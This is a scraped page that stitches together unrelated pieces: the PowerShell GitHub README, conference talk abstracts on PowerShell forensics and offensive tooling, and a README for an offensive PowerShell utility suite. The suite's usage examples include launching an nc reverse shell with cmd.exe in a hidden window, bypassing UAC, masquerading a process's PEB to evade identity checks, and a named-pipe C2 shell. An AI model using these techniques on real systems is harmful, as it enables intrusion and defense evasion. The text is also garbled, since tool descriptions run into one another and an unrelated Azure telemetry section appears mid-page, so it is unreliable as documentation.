PowerShell for every system! PowerShell Welcome to the PowerShell GitHub Community! PowerShell is a cross-platform (Windows, Linux, and macOS) automation and configuration tool/framework that works well with your existing tools and is optimizedfor dealing with structured data (e.g. JSON, CSV, XML, etc.), REST APIs, and object models. It includes a command-line shell, an associated scripting language and a framework for processing cmdlets. Windows PowerShell vs. PowerShell Core Although this repository started as a fork of the Windows PowerShell code base, changes made in this repository do not make their way back to Windows PowerShell 5.1 automatically. This also means that issues tracked here are only for PowerShell Core 6 and higher.Windows PowerShell specific issues should be reported with the Feedback Hub app , by choosing "Apps > PowerShell" in category. New to PowerShell? If you are new to PowerShell and would like to learn more, we recommend reviewing the getting started documentation. 9BSides DC 2015 - Saturday - ** It, Do It Live (PowerShell Digital Forensics)
By Brett Thorson / Alexander Romero
BSides DC 2015 - Saturday - ** It, Do it Live (PowerShell Digital Forensics) Recent intrusion into the networks of organizations like Office of Personnel Management, Sony, JPMorgan Chase, and British Airways have shown that the question isn’t “if” your organization will be targeted, but “when”. With these attacks and many others in recent years, incident response teams have had to rapidly change tactics from the “image-and-forget” methodology to live box forensics and containment. During these engagements, forensic analysts must actively track and monitor an adversary in their network while preventing the adversary from recognizing detection but most tools are not up to the job. PowerShell brings the flexibility and in-memory nature to defenders to tackle live threats. In this talk, I will cover how my project, PowerForensics, can provide the Digital Forensics/Incident Response community with an all in one toolset for attack response and investigation. By leveraging PowerShell’s access to the Windows API and .NET framework, PowerForensics provides investigators with a forensically sound “live” investigation platform without the need to image the hard drive. I’ll cover the background and overview of PowerForensics, including how its various capabilities can facilitate the investigation of advanced actors at scale. Finally, I’ll cap off with a complex demo, showing how PowerForensics can help blue teams investigate the real attacks they’re now facing. PowerShell isn’t just for the red team anymore. Jared Atkinson (Hunt Capability Lead at Veris Group) Jared Atkinson is the Hunt Capability Lead with Veris Group’s Adaptive Threat Division and is an Adjunct Lecturer in Utica College’s M.S. in Cybersecurity program. Before working for Veris Group, Jared spent 4 years leading incident response missions for the U.S. Air Force Hunt Team, detecting and removing Advanced Persistent Threats on Air Force and DoD networks. Passionate about PowerShell and the Open Source community, Jared is the lead developer of the PowerForensics project, an open source forensics framework for PowerShell, and maintains a DFIR focused blog.

PowerShell for every system! PowerShell Welcome to the PowerShell GitHub Community!PowerShell Core is a cross-platform (Windows, Linux, and macOS) automation and configuration tool/framework that works well with your existing tools and is optimizedfor dealing with structured data (e.g. JSON, CSV, XML, etc.), REST APIs, and object models. It includes a command-line shell, an associated scripting language and a framework for processing cmdlets. My musings with PowerShell PowerShell-Suite There are great tools and resources online to accomplish most any task in PowerShell, sometimes however, there is a need to script together a util for a specific purpose or to bridge an ontological gap. This is a collection of PowerShell utilities I put together either for fun or because I had a narrow application in mind. As such the mileage you get out of them may vary but feel free to post issues or fork & adapt! Windows API Some resources to consult on Windows API access from PowerShell:* FuzzySecurity: Low-Level Windows API Access From PowerShell * Microsoft TechNet: Use PowerShell to Interact with the Windows API * Exploit Monday: Accessing the Windows API in PowerShell via internal .NET methods and reflection * Exploit Monday: Deep Reflection - Defining Structs and Enums in PowerShell Invoke-Runas Functionally equivalent to Windows "runas.exe", using Advapi32::CreateProcessWithLogonW. ```Start cmd with a local account.C:\PS> Invoke-Runas -User SomeAccount -Password SomePass -Binary C:\Windows\System32\cmd.exe -LogonType 0x1 Start cmd with remote credentials. Equivalent to "/netonly" in runas.C:\PS> Invoke-Runas -User SomeAccount -Password SomePass -Domain SomeDomain -Binary C:\Windows\System32\cmd.exe -LogonType 0x2``` Invoke-NetSessionEnum Use Netapi32::NetSessionEnum to enumerate active sessions on domain joined machines. Enumerate active sessions on "SomeHostName".C:\PS> Invoke-NetSessionEnum -HostName SomeHostName Invoke-CreateProcess Use Kernel32::CreateProcess to achieve fine-grained control over process creation from PowerShell. ```Start calc with NONE/SW SHOWNORMAL/STARTF USESHOWWINDOWC:\PS> Invoke-CreateProcess -Binary C:\Windows\System32\calc.exe -CreationFlags 0x0 -ShowWindow 0x1 -StartF 0x1 Start nc reverse shell with CREATE NO WINDOW/SW HIDE/STARTF USESHOWWINDOWC:\PS> Invoke-CreateProcess -Binary C:\Some\Path\nc.exe -Args "-nv 127.0.0.1 9988 -e C:\Windows\System32\cmd.exe" -CreationFlags 0x8000000 -ShowWindow 0x0 -StartF 0x1``` Detect-Debug Showcase a number of techniques to detect the presence of Kernel/User-Mode debuggers from PowerShell. ```Sample below is x64 Win8, WinDbg attached to PowerShell.C:\PS> Detect-Debug [+] Detect Kernel-Mode Debugging [?] SystemKernelDebuggerInformation: False [+] Detect User-Mode Debugging [?] CloseHandle Exception: Detected [?] IsDebuggerPresent: Detected [?] CheckRemoteDebuggerPresent: Detected [?] PEB!BeingDebugged: Detected [?] PEB!NtGlobalFlag: Detected [?] DebugSelf: Detected``` Get-Handles Use NtQuerySystemInformation::SystemHandleInformation to get a list of open handles in the specified process, works on x32/x64. ```Get handles for PID 2288C:\PS> Get-Handles -ProcID 2288 [>] PID 2288 --> notepad[+] Calling NtQuerySystemInformation::SystemHandleInformation[?] Success, allocated 449300 byte result buffer [>] Result buffer contains 28081 SystemHandleInformation objects[>] PID 2288 has 71 handle objects PID ObjectType HandleFlags Handle KernelPointer AccessMask --- ---------- ----------- ------ ------------- ----------2288 Directory NONE 0x0004 0x88E629F0 0x000000002288 File NONE 0x0008 0x84560C98 0x001000002288 File NONE 0x000C 0x846164F0 0x001000002288 Key NONE 0x0010 0xA3067A80 0x000200002288 ALPC Port NONE 0x0014 0x8480C810 0x001F00002288 Mutant NONE 0x0018 0x8591FEB8 0x001F00002288 Key NONE 0x001C 0x96719C48 0x000200002288 Event NONE 0x0020 0x850C6838 0x001F0000...Snip...``` Get-TokenPrivs Open a handle to a process and use Advapi32::GetTokenInformation to list the privileges associated with the process token. ```Get token privileges for PID 3836C:\PS> Get-TokenPrivs -ProcID 3836 [?] PID 3836 --> calc[+] Process handle: 1428[+] Token handle: 1028[+] Token has 5 privileges: LUID Privilege 19 SeShutdownPrivilege 23 SeChangeNotifyPrivilege 25 SeUndockPrivilege 33 SeIncreaseWorkingSetPrivilege 34 SeTimeZonePrivilege``` Get-Exports Get-Exports, fetches DLL exports and optionally provides C++ wrapper output (idential to ExportsToC++ but without needing VS and a compiled binary). In simple terms this process involves creating an NTFS transaction from a file on disk (any file will do). Next we overwrite the file in memory, create a section from the modified file and launch a process based on that section. Afterwards we roll back the transaction, leaving the original file unchanged but we end up with a process that appears to be backed by the original file. This is not a new technique, traditionally, this is accomplished by injecting a DLL into “explorer.exe”. This is not desirable because injecting into explorer may trigger security alerts and working with unmanaged DLL’s makes for an inflexible work-flow. To get around this, Bypass-UAC implements a function which rewrites PowerShell’s PEB to give it the appearance of “explorer.exe”. This provides the same effect because COM objects exclusively rely on Windows’s Process Status API (PSAPI) which reads the process PEB. ```C:\PS> Bypass-UAC -Method ucmDismMethod [!] Impersonating explorer.exe![+] PebBaseAddress: 0x000007F73E93F000[!] RtlEnterCriticalSection --> &Peb->FastPebLock[>] Overwriting &Peb->ProcessParameters.ImagePathName: 0x000000569B5F1780[>] Overwriting &Peb->ProcessParameters.CommandLine: 0x000000569B5F1790[?] Traversing &Peb->Ldr->InLoadOrderModuleList doubly linked list[>] Overwriting LDR DATA TABLE ENTRY.FullDllName: 0x000000569B5F2208[>] Overwriting LDR DATA TABLE ENTRY.BaseDllName: 0x000000569B5F2218[!] RtlLeaveCriticalSection --> &Peb->FastPebLock [>] Dropping proxy dll..[+] 64-bit Yamabiko: C:\Users\b33f\AppData\Local\Temp\yam1730961377.tmp[>] Creating XML trigger: C:\Users\b33f\AppData\Local\Temp\pac500602004.xml[>] Performing elevated IFileOperation::MoveItem operation.. From there it replaces a number of UNICODE STRING structs in memory to give powershell the appearance of a different process. Specifically, the function will overwrite powershell's "ImagePathName" & "CommandLine" in _RTL USER PROCESS PARAMETERS and the "FullDllName" & "BaseDllName" in the LDR DATA TABLE ENTRY linked list. This can be useful as it would fool any Windows work-flows which rely solely on the Process Status API to check process identity. ```C:\PS> Masquerade-PEB -BinPath C:\Windows\System32\notepad.exe [?] PID 2756[+] PebBaseAddress: 0x7FFD3000[!] RtlEnterCriticalSection --> &Peb->FastPebLock[>] Overwriting &Peb->ProcessParameters.ImagePathName: 0x002F11F8[>] Overwriting &Peb->ProcessParameters.CommandLine: 0x002F1200[?] Traversing &Peb->Ldr->InLoadOrderModuleList doubly linked list[>] Overwriting LDR DATA TABLE ENTRY.FullDllName: 0x002F1B74[>] Overwriting LDR DATA TABLE ENTRY.BaseDllName: 0x002F1B7C[!] RtlLeaveCriticalSection --> &Peb->FastPebLock``` Invoke-SMBShell POC shell using named pipes (System.IO.Pipes) as a C2 channel. As a general rule, the more addresses you disassemble, the less trustworthy the output is. The call table can be used as a reference to gauge the veracity of the output. Contribute Code If you would like to become an active contributor to this project, please follow the instructions provided in Microsoft Azure Projects Contribution Guidelines . Additional information about contributing to this repository can be found in the CONTRIBUTING.md document and the Azure PowerShell Developer Guide document. Telemetry Azure PowerShell collects telemetry data by default. Microsoft aggregates collected data to identify patterns of usage to identify common issues and to improve the experience of Azure PowerShell. Microsoft Azure PowerShell does not collect any private or personal data. For example, the usage data helps identify issues such as cmdlets with low success and helps prioritize our work. While we appreciate the insights this data provides, we also understand that not everyone wants to send usage data. You can disable data collection with the Disable-AzDataCollection cmdlet. You can also read our privacy statement to learn more. 36DEF CON 23 - Rich Kelley - Harness: Powershell Weaponization Made Easy
By DEFCONConference
The Harness toolset aims to give penetration testers and red teams the ability to pull a remote powershell interface with all the same features of the native Powershell CLI and more. Several tools and utilities have been released to solve the powershell weaponization problem, but no freely available tool give operators the full capabilities of powershell through a remote interface. We’ll start the talk with a quick survey of the previous methods of weaponizing powershell, and then move into the capabilities of the Harness toolset which includes a fully interactive powershell CLI, and remote importing of modules across the wire without staging. We’ll conclude with taking a look at the underlying code that makes the toolset work, and briefly discuss planned features. The Harness toolset will be released open source in conjunction with this talk. Speaker Bio: Rich Kelley (@RGKelley5) is a security researcher and the co-founder of Gray Tier Technologies, a small InfoSec start-up based out of Alexandria, VA. After his time in the military he held positions as a network engineer, software engineer, and penetration tester for various government agencies. He recently moved into exploit development and reverse engineering, and is pretty sure he knows less than when he started. 38Investigating PowerShell Attacks
By Black Hat
By Ryan Kazanciyan and Matt Hastings "Over the past two years, we've seen targeted attackers increasingly make use of PowerShell to conduct command-and-control in compromised Windows environments. If your organization is running Windows 7 or Server 2008 R2, you've got PowerShell 2.0 installed (and on Server 2012, remoting is enabled by default!). This has created a whole new playground of attack techniques for intruders that have already popped a few admin accounts (or an entire domain). Even if you're not legitimately using PowerShell to administer your systems, you need to be aware of how attackers can enable and abuse its features. This presentation will focus on common attack patterns performed through PowerShell - such as lateral movement, remote command execution, reconnaissance, file transfer, and establishing persistence - and the sources of evidence they leave behind. We'll demonstrate how to collect and interpret these forensic artifacts, both on individual hosts and at scale across the enterprise. Throughout the presentation, we'll include examples from real-world incidents and recommendations on how to limit exposure to these attacks." 47DEF CON 21 - Joe Bialek - PowerPwning Post Exploiting By Overpowering PowerShell
By DEFCONConference
PowerPwning: Post-Exploiting By Overpowering PowerShell JOE BIALEK SECURITY ENGINEER, MICROSOFT PowerShell is a scripting language included with all modern Windows operating systems, which, among other features, provides access to the Win32 API and the capability to run scripts on remote servers without writing to disk. PowerShell scripts bypass application white listing, application-signing requirements, and generally bypass anti-virus as well. While all of these characteristics are very desirable to a penetration tester, rewriting penetration test tools in PowerShell would be time consuming. Instead, I will show how to combine PowerShell and assembly to reflectively load existing EXE's and DLL's without writing to disk, triggering anti-virus, or triggering application whitelisting. I'll finish with several demonstrations of the Invoke-ReflectivePEInjection script in action. Joe Bialek (@JosephBialek) is currently a Security Engineer on the Office 365 Red Team at Microsoft where he does security research, red teaming, penetration testing, tool development, and code review. Joe was a contributor to Microsoft's Pass the Hash guidance paper, and has been a contributor to other large security efforts within the company. Prior to his role at Microsoft, Joe graduated from Western Washington University with a Bachelors degree in Computer Science.
